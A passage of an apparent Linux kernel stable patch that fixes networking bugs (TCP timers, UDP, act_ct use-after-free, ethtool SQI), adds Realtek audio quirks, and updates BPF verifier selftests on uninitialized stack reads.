+-	smap = bpf_local_storage_map_alloc(attr);
+-	if (IS_ERR(smap))
+-		return ERR_CAST(smap);
+-
+-	smap->cache_idx = bpf_local_storage_cache_idx_get(&sk_cache);
+-	return &smap->map;
++	return bpf_local_storage_map_alloc(attr, &sk_cache);
+ }
+ 
+ static int notsupp_get_next_key(struct bpf_map *map, void *key,
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index cdd65ca3124a4..87c39cc12327f 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -441,11 +441,12 @@ static int __skb_datagram_iter(const struct sk_buff *skb, int offset,
+ 			if (copy > len)
+ 				copy = len;
+ 
++			n = 0;
+ 			skb_frag_foreach_page(frag,
+ 					      skb_frag_off(frag) + offset - start,
+ 					      copy, p, p_off, p_len, copied) {
+ 				vaddr = kmap_local_page(p);
+-				n = INDIRECT_CALL_1(cb, simple_copy_to_iter,
++				n += INDIRECT_CALL_1(cb, simple_copy_to_iter,
+ 					vaddr + p_off, p_len, data, to);
+ 				kunmap_local(vaddr);
+ 			}
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 8b0459a6b629f..746d950de0e14 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -433,7 +433,8 @@ int sk_msg_recvmsg(struct sock *sk, struct sk_psock *psock, struct msghdr *msg,
+ 			page = sg_page(sge);
+ 			if (copied + copy > len)
+ 				copy = len - copied;
+-			copy = copy_page_to_iter(page, sge->offset, copy, iter);
++			if (copy)
++				copy = copy_page_to_iter(page, sge->offset, copy, iter);
+ 			if (!copy) {
+ 				copied = copied ? copied : -EFAULT;
+ 				goto out;
+diff --git a/net/ethtool/linkstate.c b/net/ethtool/linkstate.c
+index fb676f349455a..470582a70ccbe 100644
+--- a/net/ethtool/linkstate.c
++++ b/net/ethtool/linkstate.c
+@@ -36,6 +36,8 @@ static int linkstate_get_sqi(struct net_device *dev)
+ 	mutex_lock(&phydev->lock);
+ 	if (!phydev->drv || !phydev->drv->get_sqi)
+ 		ret = -EOPNOTSUPP;
++	else if (!phydev->link)
++		ret = -ENETDOWN;
+ 	else
+ 		ret = phydev->drv->get_sqi(phydev);
+ 	mutex_unlock(&phydev->lock);
+@@ -54,6 +56,8 @@ static int linkstate_get_sqi_max(struct net_device *dev)
+ 	mutex_lock(&phydev->lock);
+ 	if (!phydev->drv || !phydev->drv->get_sqi_max)
+ 		ret = -EOPNOTSUPP;
++	else if (!phydev->link)
++		ret = -ENETDOWN;
+ 	else
+ 		ret = phydev->drv->get_sqi_max(phydev);
+ 	mutex_unlock(&phydev->lock);
+@@ -61,6 +65,17 @@ static int linkstate_get_sqi_max(struct net_device *dev)
+ 	return ret;
+ };
+ 
++static bool linkstate_sqi_critical_error(int sqi)
++{
++	return sqi < 0 && sqi != -EOPNOTSUPP && sqi != -ENETDOWN;
++}
++
++static bool linkstate_sqi_valid(struct linkstate_reply_data *data)
++{
++	return data->sqi >= 0 && data->sqi_max >= 0 &&
++	       data->sqi <= data->sqi_max;
++}
++
+ static int linkstate_get_link_ext_state(struct net_device *dev,
+ 					struct linkstate_reply_data *data)
+ {
+@@ -92,12 +107,12 @@ static int linkstate_prepare_data(const struct ethnl_req_info *req_base,
+ 	data->link = __ethtool_get_link(dev);
+ 
+ 	ret = linkstate_get_sqi(dev);
+-	if (ret < 0 && ret != -EOPNOTSUPP)
++	if (linkstate_sqi_critical_error(ret))
+ 		goto out;
+ 	data->sqi = ret;
+ 
+ 	ret = linkstate_get_sqi_max(dev);
+-	if (ret < 0 && ret != -EOPNOTSUPP)
++	if (linkstate_sqi_critical_error(ret))
+ 		goto out;
+ 	data->sqi_max = ret;
+ 
+@@ -122,11 +137,10 @@ static int linkstate_reply_size(const struct ethnl_req_info *req_base,
+ 	len = nla_total_size(sizeof(u8)) /* LINKSTATE_LINK */
+ 		+ 0;
+ 
+-	if (data->sqi != -EOPNOTSUPP)
+-		len += nla_total_size(sizeof(u32));
+-
+-	if (data->sqi_max != -EOPNOTSUPP)
+-		len += nla_total_size(sizeof(u32));
++	if (linkstate_sqi_valid(data)) {
++		len += nla_total_size(sizeof(u32)); /* LINKSTATE_SQI */
++		len += nla_total_size(sizeof(u32)); /* LINKSTATE_SQI_MAX */
++	}
+ 
+ 	if (data->link_ext_state_provided)
+ 		len += nla_total_size(sizeof(u8)); /* LINKSTATE_EXT_STATE */
+@@ -147,13 +161,14 @@ static int linkstate_fill_reply(struct sk_buff *skb,
+ 	    nla_put_u8(skb, ETHTOOL_A_LINKSTATE_LINK, !!data->link))
+ 		return -EMSGSIZE;
+ 
+-	if (data->sqi != -EOPNOTSUPP &&
+-	    nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI, data->sqi))
+-		return -EMSGSIZE;
++	if (linkstate_sqi_valid(data)) {
++		if (nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI, data->sqi))
++			return -EMSGSIZE;
+ 
+-	if (data->sqi_max != -EOPNOTSUPP &&
+-	    nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI_MAX, data->sqi_max))
+-		return -EMSGSIZE;
++		if (nla_put_u32(skb, ETHTOOL_A_LINKSTATE_SQI_MAX,
++				data->sqi_max))
++			return -EMSGSIZE;
++	}
+ 
+ 	if (data->link_ext_state_provided) {
+ 		if (nla_put_u8(skb, ETHTOOL_A_LINKSTATE_EXT_STATE,
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 317cb90d77102..359ffda9b736b 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -2101,8 +2101,16 @@ void tcp_clear_retrans(struct tcp_sock *tp)
+ static inline void tcp_init_undo(struct tcp_sock *tp)
+ {
+ 	tp->undo_marker = tp->snd_una;
++
+ 	/* Retransmission still in flight may cause DSACKs later. */
+-	tp->undo_retrans = tp->retrans_out ? : -1;
++	/* First, account for regular retransmits in flight: */
++	tp->undo_retrans = tp->retrans_out;
++	/* Next, account for TLP retransmits in flight: */
++	if (tp->tlp_high_seq && tp->tlp_retrans)
++		tp->undo_retrans++;
++	/* Finally, avoid 0, because undo_retrans==0 means "can undo now": */
++	if (!tp->undo_retrans)
++		tp->undo_retrans = -1;
+ }
+ 
+ static bool tcp_is_rack(const struct sock *sk)
+@@ -2181,6 +2189,7 @@ void tcp_enter_loss(struct sock *sk)
+ 
+ 	tcp_set_ca_state(sk, TCP_CA_Loss);
+ 	tp->high_seq = tp->snd_nxt;
++	tp->tlp_high_seq = 0;
+ 	tcp_ecn_queue_cwr(tp);
+ 
+ 	/* F-RTO RFC5682 sec 3.1 step 1: retransmit SND.UNA if no previous
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index 44b49f7d1a9e6..016f9eff49b40 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -444,17 +444,34 @@ static void tcp_fastopen_synack_timer(struct sock *sk, struct request_sock *req)
+ static bool tcp_rtx_probe0_timed_out(const struct sock *sk,
+ 				     const struct sk_buff *skb)
+ {
++	const struct inet_connection_sock *icsk = inet_csk(sk);
++	u32 user_timeout = READ_ONCE(icsk->icsk_user_timeout);
+ 	const struct tcp_sock *tp = tcp_sk(sk);
+-	const int timeout = TCP_RTO_MAX * 2;
+-	u32 rcv_delta, rtx_delta;
+-
+-	rcv_delta = inet_csk(sk)->icsk_timeout - tp->rcv_tstamp;
+-	if (rcv_delta <= timeout)
+-		return false;
++	int timeout = TCP_RTO_MAX * 2;
++	u32 rtx_delta;
++	s32 rcv_delta;
+ 
+ 	rtx_delta = (u32)msecs_to_jiffies(tcp_time_stamp(tp) -
+ 			(tp->retrans_stamp ?: tcp_skb_timestamp(skb)));
+ 
++	if (user_timeout) {
++		/* If user application specified a TCP_USER_TIMEOUT,
++		 * it does not want win 0 packets to 'reset the timer'
++		 * while retransmits are not making progress.
++		 */
++		if (rtx_delta > user_timeout)
++			return true;
++		timeout = min_t(u32, timeout, msecs_to_jiffies(user_timeout));
++	}
++
++	/* Note: timer interrupt might have been delayed by at least one jiffy,
++	 * and tp->rcv_tstamp might very well have been written recently.
++	 * rcv_delta can thus be negative.
++	 */
++	rcv_delta = icsk->icsk_timeout - tp->rcv_tstamp;
++	if (rcv_delta <= timeout)
++		return false;
++
+ 	return rtx_delta > timeout;
+ }
+ 
+@@ -496,8 +513,6 @@ void tcp_retransmit_timer(struct sock *sk)
+ 	if (WARN_ON_ONCE(!skb))
+ 		return;
+ 
+-	tp->tlp_high_seq = 0;
+-
+ 	if (!tp->snd_wnd && !sock_flag(sk, SOCK_DEAD) &&
+ 	    !((1 << sk->sk_state) & (TCPF_SYN_SENT | TCPF_SYN_RECV))) {
+ 		/* Receiver dastardly shrinks window. Our retransmits
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index b8f93c1479ae1..53267566808c1 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -319,6 +319,8 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 			goto fail_unlock;
+ 		}
+ 
++		sock_set_flag(sk, SOCK_RCU_FREE);
++
+ 		sk_add_node_rcu(sk, &hslot->head);
+ 		hslot->count++;
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -335,7 +337,7 @@ int udp_lib_get_port(struct sock *sk, unsigned short snum,
+ 		hslot2->count++;
+ 		spin_unlock(&hslot2->lock);
+ 	}
+-	sock_set_flag(sk, SOCK_RCU_FREE);
++
+ 	error = 0;
+ fail_unlock:
+ 	spin_unlock_bh(&hslot->lock);
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index cd95a315fde82..44ff7f356ec15 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -1212,6 +1212,14 @@ static int tcf_ct_act(struct sk_buff *skb, const struct tc_action *a,
+ 		 */
+ 		if (nf_conntrack_confirm(skb) != NF_ACCEPT)
+ 			goto drop;
++
++		/* The ct may be dropped if a clash has been resolved,
++		 * so it's necessary to retrieve it from skb again to
++		 * prevent UAF.
++		 */
++		ct = nf_ct_get(skb, &ctinfo);
++		if (!ct)
++			skip_add = true;
+ 	}
+ 
+ 	if (!skip_add)
+diff --git a/net/sunrpc/xprtsock.c b/net/sunrpc/xprtsock.c
+index 05aa32696e7c2..02f651f85e739 100644
+--- a/net/sunrpc/xprtsock.c
++++ b/net/sunrpc/xprtsock.c
+@@ -2333,6 +2333,13 @@ static void xs_tcp_setup_socket(struct work_struct *work)
+ 		transport->srcport = 0;
+ 		status = -EAGAIN;
+ 		break;
++	case -EPERM:
++		/* Happens, for instance, if a BPF program is preventing
++		 * the connect. Remap the error so upper layers can better
++		 * deal with it.
++		 */
++		status = -ECONNREFUSED;
++		fallthrough;
+ 	case -EINVAL:
+ 		/* Happens, for instance, if the user specified a link
+ 		 * local IPv6 address without a scope-id.
+diff --git a/scripts/ld-version.sh b/scripts/ld-version.sh
+index a78b804b680cf..b9513d224476f 100755
+--- a/scripts/ld-version.sh
++++ b/scripts/ld-version.sh
+@@ -57,9 +57,11 @@ else
+ 	fi
+ fi
+ 
+-# Some distributions append a package release number, as in 2.34-4.fc32
+-# Trim the hyphen and any characters that follow.
+-version=${version%-*}
++# There may be something after the version, such as a distribution's package
++# release number (like Fedora's "2.34-4.fc32") or punctuation (like LLD briefly
++# added before the "compatible with GNU linkers" string), so strip everything
++# after the leading run of digits and periods.
++version=${version%%[!0-9.]*}
+ 
+ cversion=$(get_canonical_version $version)
+ min_cversion=$(get_canonical_version $min_version)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 4635dc70a8404..06f00819d1a8a 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9661,6 +9661,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x83b9, "HP Spectre x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x841c, "HP Pavilion 15-CK0xx", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+ 	SND_PCI_QUIRK(0x103c, 0x8497, "HP Envy x360", ALC269_FIXUP_HP_MUTE_LED_MIC3),
++	SND_PCI_QUIRK(0x103c, 0x84a6, "HP 250 G7 Notebook PC", ALC269_FIXUP_HP_LINE1_MIC1_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x84ae, "HP 15-db0403ng", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x84da, "HP OMEN dc0019-ur", ALC295_FIXUP_HP_OMEN),
+ 	SND_PCI_QUIRK(0x103c, 0x84e7, "HP Pavilion 15", ALC269_FIXUP_HP_MUTE_LED_MIC3),
+@@ -9922,6 +9923,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x10cf, 0x1845, "Lifebook U904", ALC269_FIXUP_LIFEBOOK_EXTMIC),
+ 	SND_PCI_QUIRK(0x10ec, 0x10f2, "Intel Reference board", ALC700_FIXUP_INTEL_REFERENCE),
+ 	SND_PCI_QUIRK(0x10ec, 0x118c, "Medion EE4254 MD62100", ALC256_FIXUP_MEDION_HEADSET_NO_PRESENCE),
++	SND_PCI_QUIRK(0x10ec, 0x11bc, "VAIO VJFE-IL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x10ec, 0x1230, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x124c, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0x10ec, 0x1252, "Intel Reference board", ALC295_FIXUP_CHROME_BOOK),
+@@ -10015,6 +10017,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1558, 0xa600, "Clevo NL50NU", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa650, "Clevo NP[567]0SN[CD]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xa671, "Clevo NP70SN[CDE]", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1558, 0xa763, "Clevo V54x_6x_TU", ALC256_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb018, "Clevo NP50D[BE]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb019, "Clevo NH77D[BE]Q", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1558, 0xb022, "Clevo NH77D[DC][QW]", ALC293_FIXUP_SYSTEM76_MIC_NO_PRESENCE),
+@@ -10153,6 +10156,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1d72, 0x1901, "RedmiBook 14", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1945, "Redmi G", ALC256_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1d72, 0x1947, "RedmiBook Air", ALC255_FIXUP_XIAOMI_HEADSET_MIC),
++	SND_PCI_QUIRK(0x2782, 0x0214, "VAIO VJFE-CL", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x2782, 0x0232, "CHUWI CoreBook XPro", ALC269VB_FIXUP_CHUWI_COREBOOK_XPRO),
+ 	SND_PCI_QUIRK(0x2782, 0x1707, "Vaio VJFE-ADL", ALC298_FIXUP_SPK_VOLUME),
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+diff --git a/tools/testing/selftests/bpf/progs/test_global_func10.c b/tools/testing/selftests/bpf/progs/test_global_func10.c
+index 97b7031d0e227..d361eba167f6a 100644
+--- a/tools/testing/selftests/bpf/progs/test_global_func10.c
++++ b/tools/testing/selftests/bpf/progs/test_global_func10.c
+@@ -4,12 +4,12 @@
+ #include <bpf/bpf_helpers.h>
+ 
+ struct Small {
+-	int x;
++	long x;
+ };
+ 
+ struct Big {
+-	int x;
+-	int y;
++	long x;
++	long y;
+ };
+ 
+ __noinline int foo(const struct Big *big)
+@@ -21,7 +21,8 @@ __noinline int foo(const struct Big *big)
+ }
+ 
+ SEC("cgroup_skb/ingress")
+-int test_cls(struct __sk_buff *skb)
++__failure __msg("invalid indirect access to stack")
++int global_func10(struct __sk_buff *skb)
+ {
+ 	const struct Small small = {.x = skb->len };
+ 
+diff --git a/tools/testing/selftests/bpf/verifier/calls.c b/tools/testing/selftests/bpf/verifier/calls.c
+index e1a937277b54d..a201d2871bfbd 100644
+--- a/tools/testing/selftests/bpf/verifier/calls.c
++++ b/tools/testing/selftests/bpf/verifier/calls.c
+@@ -2221,19 +2221,22 @@
+ 	 * that fp-8 stack slot was unused in the fall-through
+ 	 * branch and will accept the program incorrectly
+ 	 */
+-	BPF_JMP_IMM(BPF_JGT, BPF_REG_1, 2, 2),
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_JMP_IMM(BPF_JGT, BPF_REG_0, 2, 2),
+ 	BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
+ 	BPF_JMP_IMM(BPF_JA, 0, 0, 0),
+ 	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
+ 	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
+ 	BPF_LD_MAP_FD(BPF_REG_1, 0),
+ 	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
++	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.fixup_map_hash_48b = { 6 },
+-	.errstr = "invalid indirect read from stack R2 off -8+0 size 8",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_XDP,
++	.fixup_map_hash_48b = { 7 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -8+0 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"calls: ctx read at start of subprog",
+diff --git a/tools/testing/selftests/bpf/verifier/helper_access_var_len.c b/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
+index a6c869a7319cd..9c4885885aba0 100644
+--- a/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
++++ b/tools/testing/selftests/bpf/verifier/helper_access_var_len.c
+@@ -29,19 +29,30 @@
+ {
+ 	"helper access to variable memory: stack, bitwise AND, zero included",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, -128),
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 64),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	/* use bitwise AND to limit r3 range to [0, 64] */
++	BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 64),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(); it is one of a few helper functions with
++	 * an ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory at &fp[-64] is
++	 * not initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+0 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 4 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+0 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: stack, bitwise AND + JMP, wrong max",
+@@ -183,20 +194,31 @@
+ {
+ 	"helper access to variable memory: stack, JMP, no min check",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, -128),
+-	BPF_JMP_IMM(BPF_JGT, BPF_REG_2, 64, 3),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	/* use JMP to limit r3 range to [0, 64] */
++	BPF_JMP_IMM(BPF_JGT, BPF_REG_3, 64, 6),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(); it is one of a few helper functions with
++	 * an ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory at &fp[-64] is
++	 * not initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+0 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 4 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+0 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: stack, JMP (signed), no min check",
+@@ -564,29 +586,41 @@
+ {
+ 	"helper access to variable memory: 8 bytes leak",
+ 	.insns = {
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_1, 8),
+-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -64),
++	/* set max stack size */
++	BPF_ST_MEM(BPF_DW, BPF_REG_10, -128, 0),
++	/* set r3 to a random value */
++	BPF_EMIT_CALL(BPF_FUNC_get_prandom_u32),
++	BPF_MOV64_REG(BPF_REG_3, BPF_REG_0),
++	BPF_LD_MAP_FD(BPF_REG_1, 0),
++	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -64),
+ 	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -64),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -56),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -48),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -40),
++	/* Note: fp[-32] left uninitialized */
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -24),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -16),
+ 	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_0, -8),
+-	BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -128),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, -128),
+-	BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 63),
+-	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),
+-	BPF_MOV64_IMM(BPF_REG_3, 0),
+-	BPF_EMIT_CALL(BPF_FUNC_probe_read_kernel),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_10, -16),
++	/* Limit r3 range to [1, 64] */
++	BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 63),
++	BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 1),
++	BPF_MOV64_IMM(BPF_REG_4, 0),
++	/* Call bpf_ringbuf_output(); it is one of a few helper functions with
++	 * an ARG_CONST_SIZE_OR_ZERO parameter allowed in unpriv mode.
++	 * For unpriv this should signal an error, because memory region [1, 64]
++	 * at &fp[-64] is not fully initialized.
++	 */
++	BPF_EMIT_CALL(BPF_FUNC_ringbuf_output),
++	BPF_MOV64_IMM(BPF_REG_0, 0),
+ 	BPF_EXIT_INSN(),
+ 	},
+-	.errstr = "invalid indirect read from stack R1 off -64+32 size 64",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.fixup_map_ringbuf = { 3 },
++	.errstr_unpriv = "invalid indirect read from stack R2 off -64+32 size 64",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"helper access to variable memory: 8 bytes no leak (init memory)",
+diff --git a/tools/testing/selftests/bpf/verifier/int_ptr.c b/tools/testing/selftests/bpf/verifier/int_ptr.c
+index 070893fb29007..02d9e004260b3 100644
+--- a/tools/testing/selftests/bpf/verifier/int_ptr.c
++++ b/tools/testing/selftests/bpf/verifier/int_ptr.c
+@@ -54,12 +54,13 @@
+ 		/* bpf_strtoul() */
+ 		BPF_EMIT_CALL(BPF_FUNC_strtoul),
+ 
+-		BPF_MOV64_IMM(BPF_REG_0, 1),
++		BPF_MOV64_IMM(BPF_REG_0, 0),
+ 		BPF_EXIT_INSN(),
+ 	},
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_CGROUP_SYSCTL,
+-	.errstr = "invalid indirect read from stack R4 off -16+4 size 8",
++	.result_unpriv = REJECT,
++	.errstr_unpriv = "invalid indirect read from stack R4 off -16+4 size 8",
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"ARG_PTR_TO_LONG misaligned",
+diff --git a/tools/testing/selftests/bpf/verifier/search_pruning.c b/tools/testing/selftests/bpf/verifier/search_pruning.c
+index d63fd8991b03a..745d6b5842fd4 100644
+--- a/tools/testing/selftests/bpf/verifier/search_pruning.c
++++ b/tools/testing/selftests/bpf/verifier/search_pruning.c
+@@ -128,9 +128,10 @@
+ 		BPF_EXIT_INSN(),
+ 	},
+ 	.fixup_map_hash_8b = { 3 },
+-	.errstr = "invalid read from stack off -16+0 size 8",
+-	.result = REJECT,
+-	.prog_type = BPF_PROG_TYPE_TRACEPOINT,
++	.errstr_unpriv = "invalid read from stack off -16+0 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+ {
+ 	"precision tracking for u32 spill/fill",
+@@ -258,6 +259,8 @@
+ 	BPF_EXIT_INSN(),
+ 	},
+ 	.flags = BPF_F_TEST_STATE_FREQ,
+-	.errstr = "invalid read from stack off -8+1 size 8",
+-	.result = REJECT,
++	.errstr_unpriv = "invalid read from stack off -8+1 size 8",
++	.result_unpriv = REJECT,
++	/* in privileged mode reads from uninitialized stack locations are permitted */
++	.result = ACCEPT,
+ },
+diff --git a/tools/testing/selftests/bpf/verifier/sock.c b/tools/testing/selftests/bpf/verifier/sock.c
+index d11d0b28be416..108dd3ee1edda 100644
+--- a/tools/testing/selftests/bpf/verifier/sock.c
++++ b/tools/testing/selftests/bpf/verifier/sock.c
+@@ -530,33 +530,6 @@
+ 	.prog_type = BPF_PROG_TYPE_SCHED_CLS,
+ 	.result = ACCEPT,
+ },
+-{
+-	"sk_storage_get(map, skb->sk, &stack_value, 1): partially init stack_value",
+-	.insns = {
+-	BPF_MOV64_IMM(BPF_REG_2, 0),
+-	BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_2, -8),
+-	BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_1, offsetof(struct __sk_buff, sk)),
+-	BPF_JMP_IMM(BPF_JNE, BPF_REG_1, 0, 2),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
+-	BPF_EXIT_INSN(),
+-	BPF_EMIT_CALL(BPF_FUNC_sk_fullsock),
+-	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
+-	BPF_MOV64_IMM(BPF_REG_0, 0),
